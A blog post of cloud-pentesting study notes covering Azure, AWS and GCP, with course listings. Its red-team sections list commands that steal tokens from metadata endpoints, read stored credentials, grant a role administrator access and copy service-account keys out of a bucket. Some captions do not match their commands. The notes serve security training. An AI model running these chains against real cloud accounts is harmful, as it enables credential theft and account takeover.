Hi Guys! enough is enough…

I’m going strong with Cloud this Year! And I mean it. 😈 I’ll do every course and certification of Cloud imaginable to mankind. And u’ll get the best of it.

My main focus will be in this order - Azure > AWS > GCP

anyway… Lets start looking at main components and commands of Cloud Pentesting!

Azure

AWS

GCP

Azure

Intro to Azure
Authentication Methods
CLI Based Enumeration
Red Team Ops in Azure

Intro to Azure

Microsoft Azure, commonly referred to as Azure, is a cloud computing service created by Microsoft for building, testing, deploying, and managing applications and services through Microsoft-managed data centers.

3 Main Components of Azure:

Azure Active Directory (AAD)
Azure Resource Manager (ARM)
Office 365 (O365)

Azure Active Directory (AAD)

Azure Active Directory (Azure AD) is Microsoft’s cloud-based identity and access management service, which helps the employees sign in and access resources in the cloud and on-premise. Azure Resource Manager (ARM)
Azure Resource Manager (ARM) is the native platform for infrastructure as code (IaC) in Azure. It enables you to centralize the management, deployment, and security of Azure resources. Office 365 (O365)
Office 365 is a cloud-based suite of productivity and collaboration apps.

Authentication Methods

Short Term Credential:

AAD Username & Password
SSO Username & Password OAuth Access Token

Long Term Credential:

Username & Password
Client ID & Secret / Certificate

CLI Based Enumeration

Enumeration: Entra ID / Azure AD

Check if the target organization is using Entra ID as an Identity Provider (IDP):

https://login.microsoftonline.com/getuserrealm.srf?login=Username@DomainName&xml=1

Enumeration: Azure Resource Manager

Lists various commands for enumeration in Azure Resource Manager:

az account show
az account list --all
az role assignment list --assignee ObjectID/Sign-InEmail/ServicePrincipal --all
az role definition list --custom-role-only

Red Team Ops in Azure

az login

Get details about currently logged-in session:

az account list

Connect-MgGraph -Scopes "Directory.Read.All"

Get currently logged-in session information:

Get-MgContext

Get access token with Az CLI:

az account get-access-token --resource https://graph.microsoft.com

Connect-MgGraph -AccessToken [TOKEN]

Get the User ID of the “auditor” user:

Get-MgUser -Filter "startswith(displayName,'auditor')"

List all objects owned by the logged-in user:

Get-MgUserOwnedObject -UserId [UserID] | ConvertTo-Json

Get an application object id & app id:

Get-MgApplication -Filter "startswith(displayName,'prod-app')"

Get details about the owner of the specified applications:

Get-MgApplicationOwner -ApplicationId "AppObjectID" | ConvertTo-Json

Check the directory role assigned to the prod application:

Add-MgApplicationPassword -ApplicationId "AppObjectID" | ConvertTo-Json

Get all the role assignments “auditor” user has on Azure subscription (ARM: Azure Resource Manager):

az role assignment list --assignee 'auditor@domain.com' --all

Get the list of all available subscriptions:

az vm list

Enumerate VM Instance and its public IP address:

az vm list-ip-addresses --name prod-vm --resource-group PROD-RG

Exploit a public-facing application and retrieve the access token of managed identity attached to VM:

curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

Configure access token in Az PowerShell CLI:

$token = "AccessToken"

Connect to Az Account using Access Token:

Connect-AzAccount -AccessToken $token -AccountId [Subscription ID]

Check the role assignment of managed identity attached to VM:

Get-AzRoleAssignment -ObjectId [PrincipalID-ManagedIdentity]

AWS

Introduction to AWS
Authentication Methods
CLI Based Enumeration
Red Team Ops in AWS

Intro to AWS

SDK/API

AWS CLI
GUI Storage
Compute
Control Plane
AWS Services
Data Plane
Cloud Space
Web Client
End User

AWS Web Portal

IAM Username & Password
SSO Username & Password
Long Term Key: Access Key ID & Secret
Short Term Key: Access Key ID & Secret & Token

AWS Architecture

AWS services
Compute
Storage
Access Management
Identity
Networking
VPC
Security
Cloud Trail
Guard duty
IAM
SSO
EC2 Lambda ECS / EKS
S3
RDS
EBS
IAM
CloudWatch

Identity and Access Management

IAM

AWS Identity and Access Management (IAM) enables you to manage access to AWS services and resources securely. IAM allows you to create and manage AWS users and groups and use permissions to allow and deny their access to AWS resources.

AWS IAM allows:

Manage IAM users, groups, and their access.
Manage IAM roles and their permissions.
Manage federated users and their permissions.

IAM Groups, Users, Roles, Actions, Policy

Policy Contains Permissions
Policy Attached to User
Policy Attached to Roles
Policy Attached to Groups
Role Attached to Services
Effect Resources

Users

An AWS Identity and Access Management (IAM) user is an entity that you create in AWS to represent the person or application that uses it to interact with AWS. A user in AWS consists of a name and credentials.

Groups

An IAM group is a collection of IAM users. Groups let you specify permissions for multiple users, which can make it easier to manage the permissions for those users.

Roles

An IAM role is an IAM entity that defines a set of permissions for making AWS service requests. IAM roles are associated with AWS services such as EC2, RDS, etc.

Role for EC2 services IAM

EC2 S3
Role Attach to EC2 Instance
Full permission
EC2 Instance can access S3 Bucket

IAM Role has a trusted entity to EC2. So EC2 can assume this role.

Policies

IAM policies define permissions for an action to perform the operation. For example, if a policy allows the GetUser action, then a user with that policy can get user information from the AWS Management Console, the AWS CLI, or the AWS API. Policies can be attached to IAM identities (users, groups, or roles) or AWS resources.

Policy Data:

Effect - Use to Allow or Deny Access
Action - Include a list of actions (Get, Put, Delete) that the policy allows or denies.
Resource - A list of resources to which the actions apply

Policy types:

Inline Policies - An inline policy is a policy that’s embedded in an IAM identity (a user, group, or role)
Managed Policies
- AWS Managed Policies
- Customer Managed Policies

Authentication Methods

Short Term Credential:

AAD Username & Password
SSO Username & Password OAuth Access Token

Long Term Credential:

Username & Password
Client ID & Secret / Certificate

Credentials Programmatic Interface (CLI/ SDK):

Programmatic Interface (CLI/ SDK)
Graphical User Interface (GUI)
IAM Username & Password
SSO Username & Password
Access Key ID
Secret Access Key
Session Token
Access Key ID
Secret Access Key

AWS Cloud Authentication

Authentication to AWS Management Portal

IAM Root User’s credential [Username + Password] - Long Term Access

https://console.aws.amazon.com/

IAM User’s credential [Username + Password] - Long Term Access

https://console.aws.amazon.com/

SSO User’s credential [Username + Password] - Long Term Access

https://Org-Name.awsapps.com/start

Authentication to AWS using AWS CLI

Long Term: Access Key ID + Access Key Secret

aws configure --profile profile-name

Programmatic Access (Access Key ID + Access Key Secret)

aws sts get-caller-identity --profile profile-name

Get the information about configured identity.

aws configure

Programmatic Access (Access Key ID + Access Key Secret + Session Token)

aws sts get-caller-identity --profile profile-name

Get the information about configured identity.

Windows

C:\Users\UserName\.aws

AWS CLI Stored Credentials

Linux

/home/UserName/.aws

AWS CLI Stored Credentials:

cat credentials

Content of credentials file.

Enumeration

List the IAM groups that the specified IAM user belongs to:

aws iam list-groups-for-user --user-name [user-name]

List of IAM Users:

aws iam list-users

List all manages policies that are attached to the specified IAM user:

aws iam list-attached-user-policies --user-name [user-name]

Lists the names of the inline policies embedded in the specified IAM user:

aws iam list-user-policies --user-name [user-name]

List of IAM Groups:

aws iam list-groups

List of all users in a group:

aws iam get-group --group-name [group-name]

Lists all managed policies that are attached to the specified IAM Group:

aws iam list-attached-group-policies --group-name [group-name]

List the names of the inline policies embedded in the specified IAM Group:

aws iam list-group-policies --group-name [group-name]

List of IAM Roles:

aws iam list-roles

Lists all managed policies that are attached to the specified IAM role:

aws iam list-attached-role-policies --role-name [role-name]

List the names of the inline policies embedded in the specified IAM role:

aws iam list-role-policies --role-name [role-name]

List of all IAM policies:

aws iam list-policies

Retrieves information about the specified managed policy:

aws iam get-policy --policy-arn [policy-arn]

Lists information about the versions of the specified managed policy:

aws iam list-policy-versions --policy-arn [policy-arn]

Retrieved information about the specified version of the specified managed policy:

aws iam get-policy-version --policy-arn [policy-arn] --version-id [version-id]

Retrieves the specified inline policy document that is embedded in the specified IAM user:

aws iam get-user-policy --user-name [user-name] --policy-name [policy-name]

Retrieves the specified inline policy document that is embedded in the specified IAM group:

aws iam get-group-policy --group-name [group-name] --policy-name [policy-name]

Retrieves the specified inline policy document that is embedded in the specified IAM role:

aws iam get-role-policy --role-name [role-name] --policy-name [policy-name]

Red Team Ops in AWS

Cloud Red Team Attack Life Cycle

Configure Initial Compromised User Credential:

aws configure --profile auditor

Enumerate Cloud Services, e.g., EC2, S3, etc., in an Organization AWS Account:

aws ec2 describe-instances --profile auditor

Exploit Public Facing Application Running on EC2 Instance and Retrieve Temporary Credential:

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/jump-ec2-role

[Note] Cloud meta-data can be retrieved by exploiting these web app vulnerabilities:

SSRF

RCE

Configure & Validate Temporary Credential in AWS CLI:

aws configure set aws_access_key_id [key-id] --profile ec2
aws configure set aws_secret_access_key [key-id] --profile ec2
aws configure set aws_session_token [token] --profile ec2
aws sts get-caller-identity --profile ec2

Retrieves the specified inline policy document that is embedded in the EC2 instance role:

aws iam list-attached-role-policies --role-name jump-ec2-role --profile auditor
aws iam list-role-policies --role-name jump-ec2-role --profile auditor

Get the Managed Policy Attached to EC2 Instance:

aws iam get-role-policy --role-name jump-ec2-role --policy-name jump-inline-policy --profile auditor

Get the permissions in inline policy:

aws iam attach-role-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --role-name jump-ec2-role --profile ec2

Escalate privilege by attaching administrator policy to itself:

aws iam list-attached-role-policies --role-name jump-ec2-role --profile auditor

check the managed Policy Attached to EC2 Instance.

Red Team Ops with PACU:

PACU Github

Setting the initial user access key in pacu:

set_keys
exec iam__enum_permissions
whoami

Get the permission of the current logged-in user:

exec ec2__enum
data EC2

Enumerate EC2 instance and get the public IP addresses:

set_keys
exec iam__enum_permissions
whoami

Set the temporary credential for role attached to EC2 instance:

exec iam__privesc_scan

Enumerate privilege escalation permission and exploit it:

exec iam__enum_permissions
whoami

Check the permission of the privilege escalated role.

GCP

Introduction to Google Cloud
Authentication Methods
CLI Based Enumeration
Red Team Ops in Google Cloud

Intro to Google Cloud

Main Components

Cloud Identity
Google Workspace (G Suite)
Google Cloud Platform (GCP)

Google Cloud Overview

Cloud Identity:

Identity Provider
Cloud Identity is an Identity as a Service (IDaaS) solution that centrally manages users and groups.
Configure Cloud Identity to federate identities between Google and other identity providers, such as Active Directory and Azure Active Directory.
Cloud Identity API: https://cloudidentity.googleapis.com
Organization Admin [Gcloud Role]

Cloud Identity

Google Workspace (G Suite):

Identity Provider
Google Workspace includes an inbuilt IDaaS solution for accessing SAAS Applications and GCP Resources.
Collaboration SAAS Applications like Gmail, Calendar, Meet, Chat, Drive, Docs, Sheets, Slides, Forms, Sites, and more.
Google Workspace API
Mail API
Drive API
Calendar API

Google Workspace

Google Cloud Platform (GCP):

Suite of cloud computing services running on the same infrastructure as Google’s internal products.
Regions: Independent geographic areas consisting of zones. There are around 24 regions in Google Cloud.

Google Cloud Platform

Google Cloud Space:

GCP Portal
Google Cloud API
Web Client
Gcloud CLI
API Client

Authentication:

API Key
OAuth Access Token
Username & Password (Gmail, G Suite, or Cloud Identity)
Service Account JSON File

GCP Architecture

Cloud Identity
Google Cloud Platform
Google Workspace

Identify Access Management:

User
Group
Devices
Administrator
Roles
IAM & Admin

Compute:

Compute Engine
GKE
Cloud Function

Storage:

Cloud Storage
Persistent Disk

Networking:

Identity:

User, Group & Devices
Admin Roles

SAAS:

Apps Mail
Docs, Meet, etc.

Google Cloud Services

Company Structure:

Dept X
Dept Y
Shared Infrastructure
Team A
Team B

Projects:

Dev GCP Project
Test GCP Project
Production GCP Project

Resources:

App Engine
Cloud Storage Buckets
Compute Engine Instances
Organization
Folders
Projects
Resources

GCP Resources Hierarchy

Service Account:

A service account represents a non-human user that needs to authenticate and be authorized to access data in Google APIs.
Types of service accounts:
- User-managed service accounts
- Default service accounts

Service Account Credential (Key):

IAM lets administrators authorize who can take action on specific resources, giving full control and visibility to manage Google Cloud resources centrally.
IAM follows resource-based policy instead of identity-based policy.
IAM policies are attached to resources, not identities.

Cloud IAM (Identity & Access Management)

IAM Role Binding:

Organization Level
Project Level
Resource Level

Identity (Members):

Google Account
Service Account
Google Group
Google Workspace Domain
Cloud Identity Domain
All authenticated users
All users

Roles:

Basic roles: Owner, Editor, Viewer
Predefined roles: Finer-grained access control than basic roles
Custom roles: Tailored permissions for specific needs
Roles are specified in the form of roles/service.roleName

IAM Policy Structure:

{
  "bindings": [
    {
      "role": "roles/storage.objectAdmin",
      "members": [
        "user:user1@example.com",
        "user:user2@example.com",
        "serviceAccount:my-other-app@appspot.gserviceaccount.com",
        "group:admins@example.com",
        "domain:google.com"
      ]
    },
    {
      "role": "roles/storage.objectViewer",
      "members": [
        "user:user3@example.com"
      ]
    }
  ]
}

Authentication Methods

Short Term Credential
Long Term Credential
Programmatic Interface (CLI/ SDK/ API)
Graphical User Interface (GUI)

Google Cloud Authentication Credential

Login with User Account (Username + Password)

GCP Console Access
CLI Access: gcloud auth login

Retrieve authenticated accounts:

gcloud auth list

Login with Service Account (App ID + JSON Key File)

gcloud auth activate-service-account --key-file KeyFile

Retrieve authenticated accounts:

gcloud auth list

Stored Credentials Locations:

Windows: C:\Users\UserName\AppData\Roaming\gcloud\
Linux: /home/UserName/.config/gcloud/

Database:

access_tokens.db (Columns: account_id, access_token, token_expiry, rapt_token)
credentials.db (Columns: account_id, value)

CLI Based Enumeration

gcloud auth list

Retrieve Google Cloud CLI Configuration:

gcloud config list

Organizations:

List organizations: gcloud organizations list
Retrieve IAM policy for an organization: gcloud organizations get-iam-policy [OrganizationID]

Projects:

List projects: gcloud projects list
Retrieve IAM policy for a project: gcloud projects get-iam-policy [ProjectID]

Service Accounts:

List service accounts: gcloud iam service-accounts list
Retrieve IAM policy for a service account: gcloud iam service-accounts get-iam-policy [Service Account Email ID]
List service account keys: gcloud iam service-accounts keys list --iam-account [Service Account Email ID]

Roles:

List roles: gcloud iam roles list
Retrieve permissions for a role: gcloud iam roles describe [roles/owner]

Custom Roles:

List roles in a project: gcloud iam roles list --project [ProjectID]
Retrieve permissions for a custom role: gcloud iam roles describe [RoleName] --project [ProjectID]

Red Team Ops in GCP

Configure Initial Compromised Service Account Credential:

gcloud auth activate-service-account --key-file alert-nimbus-335411-4ee19bc40a65.json

Enumerate Cloud Services:

gcloud projects get-iam-policy alert-nimbus-335411
gcloud projects get-iam-policy alert-nimbus-335411 --flatten="bindings[].members" --filter="bindings.members=serviceaccount:auditor@alert-nimbus-335411.iam.gserviceaccount.com" --format="value(bindings.role)"
gcloud compute instances list

Exploit Public Facing Application:

curl -H "Metadata-Flavor: Google" http://169.254.169.254/computeMetadata/v1/instance/service-accounts/233003792018-compute@developer.gserviceaccount.com/token

Save and Validate Access Token:

gcloud projects list --access-token-file token.txt

Retrieve IAM Policy for Service Account Attached to Compute Instance:

gcloud projects get-iam-policy alert-nimbus-335411
gcloud projects get-iam-policy alert-nimbus-335411 --flatten="bindings[].members" --filter="bindings.members=serviceaccount:233003792018-compute@developer.gserviceaccount.com" --format="value(bindings.role)"

Exfiltrate Credentials:

gcloud storage ls --access-token-file token.txt
gcloud storage ls gs://devops-storage-metatech --access-token-file token.txt
gcloud storage cp gs://devops-storage-metatech/devops-srvacc-key.json . --access-token-file token.txt

Authenticate with New Service Account Key and Retrieve IAM Policy:

gcloud auth activate-service-account --key-file devops-srvacc-key.json
gcloud projects get-iam-policy alert-nimbus-335411 --flatten="bindings[].members" --filter="bindings.members=serviceaccount:devops-service-account@alert-nimbus-335411.iam.gserviceaccount.com" --format="value(bindings.role)"

Where dafuck is the GCP Tools:

Dont worry we’ll find more or create other tools

./gcp_enum.sh

Perform authenticated enumeration using “gcp_enum” script: GCP Enum Script
Identify possible privilege escalation methods:

python3 http://privescscanner/enumerate_member_permissions.py -p alert-nimbus-335411
python3 http://privescscanner/check_for_privesc.py
python3 ExploitScripts/iam.roles.update.py

Exploit identified misconfigured IAM permissions for privilege escalation: GitHub - GCP IAM Privilege Escalation

We’ll see the particularities of each one later ;)

This is my notes of the Multi-Cloud Red Team Analyst (MCRTA) from CWL. Check their content.

Before ending the post, I did a table of courses/certification about Cloud Pentesting. So if you are interested in this path, you can search for the following:

CLOUD PENTESTING TRAINING

Category	Course	Link	Price
AZURE	CARTP	AzureADLab	$449
	CARTE	AzureAdvanced	$499
	OASP	BreachingAzure	$499
	XINTRA Azure course	Attacking and Defending Azure M365	$1550
AWS	OAWSP	BreachingAWS	$599
	CARTS	AWS Cloud Red Team Specialist (CARTS)	$599
GCP	CGRTS	Google Cloud Red Team Specialist (CGRTS)	$599
KUBERNETES	Hacking Kubernetes	Hacking and Securing Kubernetes Clusters	$178
	Kubernetes Course	Kubernetes Goat	-
EXTRA	SANS Cloud Pentesting	Cloud Penetration Testing	$8525
	AntiSyphon Cloud Training	Breaching the Cloud	$575
	CCSP	Certified Cloud Security Professional	$8140
OFICIAIS	Az900	Azure Fundamentals	-
	Az500	Azure Security Engineer	-
	AWS Security	AWS Certified Security – Specialty	-
	AWS Administrator	AWS Certified SysOps Administrator – Associate	-
	GCP Security	Google Cloud Certified - Professional Cloud Security Engineer	-
	GCP Engineer	Google Cloud Certified - Associate Cloud Engineer	-

Share on

Twitter Facebook LinkedIn

Intro to Cloud Pentesting!

Azure

Intro to Azure

3 Main Components of Azure:

Authentication Methods

Short Term Credential:

Long Term Credential:

CLI Based Enumeration

Red Team Ops in Azure

AWS

Intro to AWS

SDK/API

AWS Web Portal

AWS Architecture

Identity and Access Management

IAM

IAM Groups, Users, Roles, Actions, Policy

Authentication Methods

AWS Cloud Authentication

Authentication to AWS Management Portal

Authentication to AWS using AWS CLI

Enumeration

Red Team Ops in AWS

Cloud Red Team Attack Life Cycle

Red Team Ops with PACU:

GCP

Intro to Google Cloud

Main Components

Google Cloud Overview

Cloud Identity

Google Workspace

Google Cloud Platform

GCP Architecture

Google Cloud Services

GCP Resources Hierarchy

Cloud IAM (Identity & Access Management)

Authentication Methods

Google Cloud Authentication Credential

CLI Based Enumeration

Red Team Ops in GCP

Where dafuck is the GCP Tools:

CLOUD PENTESTING TRAINING

Share on